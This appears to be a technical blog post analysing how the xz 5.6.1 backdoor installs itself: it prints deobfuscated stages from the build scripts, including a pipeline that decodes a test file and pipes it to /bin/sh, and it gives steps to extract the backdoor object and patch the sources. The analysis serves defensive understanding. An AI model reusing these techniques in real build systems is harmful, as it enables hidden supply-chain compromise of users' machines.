Simplifying the xz backdoor

I’m not a security expert, but I am an expert at simplifying.

Throughout my career I’ve simplified many things others thought impossible, and I’ve done so by following a simple strategy few engage in: never surrender.

My past successes gave me the confidence to try simplifying one aspect of the xz backdoor: the installation of the hooks. But oh boy, was I unprepared. It is one thing to simplify code whose authors were at least trying not to overcomplicate things; it is an entirely different thing to simplify something the authors clearly did not intend anyone to understand.

It turns out even that one thing is just way too complex. However, I did not give up: I lowered my expectations and was able to simplify at least the beginning of the backdoor.

This should be helpful for people like me who are trying to figure out ways to prevent something like this from happening in the future.

For the impatient, the result is xz-min; if you follow the instructions, it should be easy to reproduce the backdoor.

We’ll start slow to be extra careful, but if you trust me you can just check the initial patch and skip the first section.

Cleanroom

As I explained in my previous post, the catalyst that enabled the backdoor is in the distributed tarball, not in the git repository. Therefore, to find all the malicious changes we need to generate a tarball ourselves, but as that post also explains, doing so produces a lot of benign differences. Even though my Arch Linux system has the same versions of autoconf and automake that they used, there’s still a lot of delta in the resulting tarball.

First of all, to generate the tarball I had to install po4a, doxygen, and ghostscript. Now, you might be thinking that there is no point in checking the documentation, but the xz project distributes PDFs. Couldn’t a malicious actor add some binary blob to a PDF and extract it in the building process? I don’t know, but I want to be absolutely certain there’s nothing there.

The PDFs were generated with ghostscript 9.55.0 and groff 1.22.4, so I installed those. Additionally, the API documentation was generated with doxygen 1.9.7, so I installed that as well. This way I was able to verify the documentation doesn’t contain anything malicious. I had to manually check the 14 distributed PDFs, and there are no extra binary blobs.

I do have to say, why distribute PDFs in the first place? These are generated from the man pages, but nobody is ever going to open lzmainfo-letter.pdf. Oh, and there are two PDFs for every man page, one for a4 and another for letter. Of course make install doesn’t install them, because nobody cares about them.

Worse than that, you don’t need ghostscript to generate a PDF from a man page, because man can do it by itself: man -Tpdf lzmainfo.1 >lzmainfo.pdf. Wait, if man can do it why are the developers of xz putting PDFs in their tarballs? Don’t ask me. But what about US Letter paper?! MANROFFOPT=-P-pletter man -Tpdf lzmainfo.

xz developers really seem to like to overcomplicate stuff.

With PDFs out of the way, the other difference is config.guess and config.sub, which don’t seem to have anything noteworthy, but still. These files are generated by automake, but if I’m using the same version (1.16.5) why are they different? Well, GNU developers like to overcomplicate stuff as well, so these files come from the config project, and each distribution deals with them differently. Arch Linux just leaves whatever is in the automake tarball, Debian has a separate autotools-dev package, and Fedora uses redhat-rpm-config.

Based on the above we can guess the malicious developers used an RPM-based distribution, because the precise combination of config.guess=2022-01-09 and config.sub=2021-12-25 doesn’t match either what is in the automake 1.16.5 release or autotools-dev 20220109.1. I checked a few Fedora packages and there doesn’t seem to be any match, but in OpenMandriva 5.0 there’s an exact match, according to RPMfind.

Using those versions the diff is almost there, except that for some reason am__DIST_COMMON in Makefile.in is missing a file. According to this thread in the automake mailing list from 2001, running automake twice makes it generate the correct Makefile.in. Don’t try to understand autotools’ voodoo logic.

This gives us the final diff.

Why go to all this trouble? I’m a completionist, I don’t want to do this step ever again, and now I’m 100% sure that the tarball xz-5.6.1.tar.xz with SHA-1 checksum a77dd4689db35cfaa814d1c3a919720bd41f5623 does not contain any other modification from the code in git, other than the diff above.
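Before comparing anything, it is worth confirming that the tarball on disk is the one discussed here. A minimal sketch, assuming GNU coreutils' sha1sum is available; verify_sha1 is a hypothetical helper name, not something from xz or xz-min:

```shell
# Hypothetical helper: succeeds only if FILE has the expected SHA-1 digest.
verify_sha1() {
    file=$1
    expected=$2
    # sha1sum prints "<digest>  <file>"; keep only the digest.
    actual=$(sha1sum "$file" | cut -d' ' -f1)
    [ "$actual" = "$expected" ]
}

# Usage with the tarball from this article (assumes it is in the current directory):
#   verify_sha1 xz-5.6.1.tar.xz a77dd4689db35cfaa814d1c3a919720bd41f5623 && echo ok
```

A matching checksum only tells you which tarball you have; it says nothing about whether the contents are benign.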

In discussions online I heard the argument that it’s easy to check the tarball, all packagers need to do is install the same version of “autotools”. Hopefully after reading this section it should be clear that if you actually try to do this, it’s not that easy.

Focus on the ball

I see a lot of analyses focused on build-to-host.m4, but that script is not run in the build process. They are probably focused on it because the diff is easier to spot, and they don’t know how autotools works.

The script that is actually run is configure; its modifications are the ones we should focus on.

For example, this popular analysis: xz/liblzma: Bash-stage Obfuscation Explained by Gynvael Coldwind explains many things, but not where gl_am_configmake came from in “stage 0”.

Because this hack is so complex it’s easy to miss things, but we are not going to do that here because we are going to focus on what this thing actually does with the advantage of knowing how autotools is supposed to work.

If you look at the hacked configure script, you see that gl_am_configmake is saved to a file $CONFIG_STATUS, which is config.status. If we open that file we see:

gl_am_configmake='./tests/files/bad-3-corrupt_lzma2.xz'

That’s much less obfuscated than the original:

gl_am_configmake=`grep -aErls "#{4}[[:alnum:]]{5}#{4}$" $srcdir/ 2>/dev/null`

But it’s only available to you if you know how autoconf works, which most people don’t. Not really.

It’s right there at the beginning of the autoconf manual, where configure scripts are explained: “a shell script called config.status that, when run, recreates the files listed above”. So configure generates config.status, and then runs it, and that’s where the build system is actually modified.
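The reason config.status is easier to read is that configure evaluates its command substitutions once and writes only the results. A toy sketch of that mechanism follows; the directory layout and payload.bin are made up for the demonstration, and the real configure writes config.status in a far more elaborate way:

```shell
# Toy stand-in for configure, run in a throwaway directory.
demo=$(mktemp -d)
mkdir -p "$demo/tests"
printf '####Hello####\n' > "$demo/tests/payload.bin"   # hypothetical marked file

(
    cd "$demo" || exit 1
    srcdir=.
    # Evaluated once, at "configure" time:
    gl_am_configmake=$(grep -aErls '#{4}[[:alnum:]]{5}#{4}$' "$srcdir/" 2>/dev/null)
    # Only the resulting value is written out, not the grep command:
    printf "gl_am_configmake='%s'\n" "$gl_am_configmake" > config.status
)

cat "$demo/config.status"
```

The generated file contains a plain path assignment, which is why reading config.status sidesteps the obfuscation in configure.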

The grep command might look daunting, but all it’s doing is looking for a file that contains a string with 4 #, then 5 alphanumeric characters, then 4 #, for example:

grep -r "####Hello####"
grep: tests/files/bad-3-corrupt_lzma2.xz: binary file matches
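To see exactly what the pattern accepts, the same extended regex can be tried against individual lines. This is a small sketch assuming GNU grep; matches is a hypothetical helper:

```shell
# Same extended regex as in the configure script, applied to single lines.
marker_re='#{4}[[:alnum:]]{5}#{4}$'
matches() { printf '%s\n' "$1" | grep -aEq "$marker_re"; }

matches '####Hello####'   && echo 'match:    ####Hello####'
matches '####World####'   && echo 'match:    ####World####'
matches '####Hi####'      || echo 'no match: only 2 alphanumerics'
matches '####Hello#### x' || echo 'no match: $ anchors the marker at end of line'
```

In the real command, -r walks the source tree, -l prints only file names, -s hides error messages, and -a treats binary files as text.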

That’s not that hard, is it?

Well, if you are looking at a script that is 25,752 lines of obfuscated shell script with no idea of what it’s trying to do on a good day and no reference to the benign version, I guess it would be hard. Fortunately that’s not what we are going to do here.

This is the true step 0.

Step 1

Based on the previous step, can you guess what the hack is going to do?

You guessed correctly: it’s going to try to do something with bad-3-corrupt_lzma2.xz, and fortunately for us all the relevant stuff is right there next to it in the config.status script:

gl_path_map='tr "\t \-_" " \t_\-"'
gl_localedir_prefix='xz'
gl_am_configmake='./tests/files/bad-3-corrupt_lzma2.xz'
localedir_c_make='\"$(localedir)\"'
gl_localedir_config='sed \"r\n\" $gl_am_configmake | eval $gl_path_map | $gl_localedir_prefix -d 2>/dev/null'

That’s going to be a little tricky to analyze… but we don’t have to, we can just echo that whole thing:

echo "sed \"r\n\" $gl_am_configmake | eval $gl_path_map | $gl_localedir_prefix -d 2>/dev/null"
sed "r\n" ./tests/files/bad-3-corrupt_lzma2.xz | eval tr "\t \-_" " \t_\-" | xz -d 2>/dev/null
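For the curious, the first two stages of that pipeline can be tried on harmless input. A sketch assuming GNU sed and GNU tr, and assuming no file literally named \n exists in the current directory:

```shell
# sed "r\n" asks sed to append the contents of a file named "\n" after each
# line; since that file does not exist, the input passes through unchanged.
printf 'unchanged\n' | sed "r\n"

# The tr call swaps tab <-> space and hyphen <-> underscore.
gl_path_map='tr "\t \-_" " \t_\-"'
printf 'a-b_c d\n' | eval $gl_path_map      # prints a_b-c<TAB>d

# The mapping is its own inverse: applying it twice restores the input.
printf 'a-b_c d\n' | eval $gl_path_map | eval $gl_path_map   # prints a-b_c d
```

So the "corrupt" test file is simply an xz stream with four byte values swapped, which is enough to make it look invalid until the swap is undone.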

But again, no need to actually understand what it does. All we need to know is that xz -d decompresses the input, so whatever it’s receiving is a valid xz stream. It turns out the output is yet another shell script which, simplified, does:

xz -dc tests/files/good-large_compressed.lzma | \
stuff | \
xz -F raw --lzma1 -dc | \
/bin/sh

Now this is where it gets tricky, because that script is quite complex. But we can just run it and see what it does, except it doesn’t do anything, so we do need to take a peek.

Deep within that script there’s an interesting check:

test -f "$srcdir/debian/rules" || test "x$RPM_ARCH" = "xx86_64"

This is testing if we are building a deb package or an rpm package, but we can just cheat with export RPM_ARCH=x86_64. We try again and bingo! Now two files are modified: libtool and src/liblzma/Makefile.
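The gate can be reproduced in isolation. A minimal sketch that wraps the same test in a hypothetical function, would_trigger, and runs it against an empty temporary directory:

```shell
# Same condition as in the script: a Debian packaging tree, or RPM_ARCH=x86_64.
would_trigger() {
    srcdir=$1
    test -f "$srcdir/debian/rules" || test "x$RPM_ARCH" = "xx86_64"
}

demo=$(mktemp -d)
unset RPM_ARCH
would_trigger "$demo" || echo "plain build: nothing happens"

# The cheat from the article: pretend to be an x86_64 RPM build.
( RPM_ARCH=x86_64; would_trigger "$demo" ) && echo "RPM_ARCH set: triggered"

# The other way in: a debian/rules file in the source directory.
mkdir "$demo/debian" && : > "$demo/debian/rules"
would_trigger "$demo" && echo "debian/rules present: triggered"
```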

This is the diff. With that, step 1 is done. So now we know what bad-3-corrupt_lzma2.xz was for.

Step 1b

Once again we don’t need to understand the changes, all we need to know is that src/liblzma/Makefile is modified. If we go to that directory and type make, a file called .libs/liblzma.so.5 is generated, and that’s really the target.

If we check for the hexdump provided in the original report:

hexdump -ve '1/1 "%.2x"' .libs/liblzma.so.5 | \
	grep -q 'f30f1efa554889f54c89ce5389fb81e7000000804883ec28488954241848894c2410'
test $? = 0 && echo hacked

The library is compromised. So something in the Makefile is in fact introducing the backdoor.

If we check the changes in the Makefile, there’s this:

am__test = bad-3-corrupt_lzma2.xz

Wait, I thought we were done with bad-3-corrupt_lzma2.xz, what’s going on?

If we indent the main script contained inside, it’s easier to see that in fact that script has two modes, one is when config.status is in the current directory, and the other is when .libs/liblzma_la-crc64_fast.o is present. So one mode is for the top level directory, the other is for when we are inside src/liblzma.
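The two modes boil down to a dispatch on which file is present. A rough sketch of that idea follows; detect_mode is a hypothetical name, and the real script wraps these checks in many more conditions:

```shell
# Hypothetical dispatcher mirroring the two modes described above.
detect_mode() {
    dir=$1
    if test -f "$dir/config.status"; then
        echo top-level      # invoked from the root of the build tree
    elif test -f "$dir/.libs/liblzma_la-crc64_fast.o"; then
        echo liblzma        # invoked from src/liblzma during make
    else
        echo none
    fi
}

# Try it on two throwaway directories.
top=$(mktemp -d); : > "$top/config.status"
lib=$(mktemp -d); mkdir "$lib/.libs"; : > "$lib/.libs/liblzma_la-crc64_fast.o"
detect_mode "$top"
detect_mode "$lib"
```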

It does make sense to reuse bad-3-corrupt_lzma2.xz, because after all it would be tricky to introduce yet another test file with a hack.

Unfortunately that second mode is much more complex, and there’s not much we can do to simplify it. The result of my best attempt at the first part is decrypt_rc4.sh, which, although much more readable, is still very complex. X user nugxperience recognized that the awk code is in fact an RC4 decrypter.

If we pass another test file, good-large_compressed.lzma, as input, the output is the ELF binary object of the backdoor, which in the build process is saved as src/liblzma/liblzma_la-crc64-fast.o.

But how is that binary used? We are almost there.

Step 1c

After saving the ELF binary object, the same script compiles both crc64_fast.c and crc32_fast.c, modifying them on the fly with sed. Additionally, it adds liblzma_la-crc64-fast.o to the object file of crc64_fast.c, which ends up containing both.

We don’t need to deal with any of that though, all we need is the result: code.diff.

From that code patch we can see that it’s changing is_arch_extension_supported() to _is_arch_extension_supported(), and there it’s calling an external _get_cpuid while the original was calling __get_cpuid. The latter is the standard one.
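To give an idea of what such an on-the-fly modification looks like, here is an illustrative sed filter that performs the two renames. These are not the exact expressions the backdoor uses, and the input lines are invented; code.diff remains the authoritative result:

```shell
# Illustrative only: rename the two calls as source text streams through sed.
rename_calls() {
    sed -e 's/is_arch_extension_supported(/_is_arch_extension_supported(/' \
        -e 's/__get_cpuid(/_get_cpuid(/'
}

# Made-up input lines, just to show the effect.
printf '%s\n' \
    'if (is_arch_extension_supported())' \
    'return __get_cpuid(1, &a, &b, &c, &d);' | rename_calls
```

A single missing underscore is all that separates the compiler-provided function from the one supplied by the malicious object file.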

The ELF binary object with the backdoor implements the spurious _get_cpuid and that’s where everything starts.

We’ve finally reached the beginning of the backdoor. That’s where the true complexity begins.

Summary

After the deobfuscation the injection is not that complex:

  1. Extract the binary object from a test file.
  2. Patch the code to call _get_cpuid from the binary object.

decrypt_rc4.sh tests/files/good-large_compressed.lzma > src/liblzma/liblzma_la-crc64-fast.o
patch -p1 < code.diff

That’s it.

In xz-min I simplify the backdoor even more, because it’s just using liblzma as a trampoline.

In both crc64_fast.c and crc32_fast.c there’s an ifunc resolver defined (crc64_resolve and crc32_resolve respectively), and it’s those resolvers that activate the backdoor by calling _get_cpuid.

But any resolver would do; the whole of liblzma is not needed. So I created a mock liblzma and the backdoor is still successfully triggered.

And of course the fun is not just building liblzma with the backdoor, but actually using it. That’s easy to do with xz-min and xzbot with a few tricks that aren’t relevant for this article.

Trying to simplify _get_cpuid will be step 2.

References